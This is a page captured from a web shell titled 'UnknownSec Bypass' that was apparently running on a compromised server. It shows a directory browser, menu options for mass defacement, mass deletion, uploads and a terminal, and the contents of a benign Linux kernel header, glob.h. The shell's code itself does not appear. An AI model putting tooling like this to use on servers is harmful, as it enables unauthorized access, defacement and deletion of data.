UnknownSec Bypass
403
:
/
proc
/
self
/
root
/
lib
/
modules
/
5.11.0-1022-aws
/
build
/
include
/
linux
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
glob.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _LINUX_GLOB_H #define _LINUX_GLOB_H #include <linux/types.h> /* For bool */ #include <linux/compiler.h> /* For __pure */ bool __pure glob_match(char const *pat, char const *str); #endif /* _LINUX_GLOB_H */
Copyright © 2025 - UnknownSec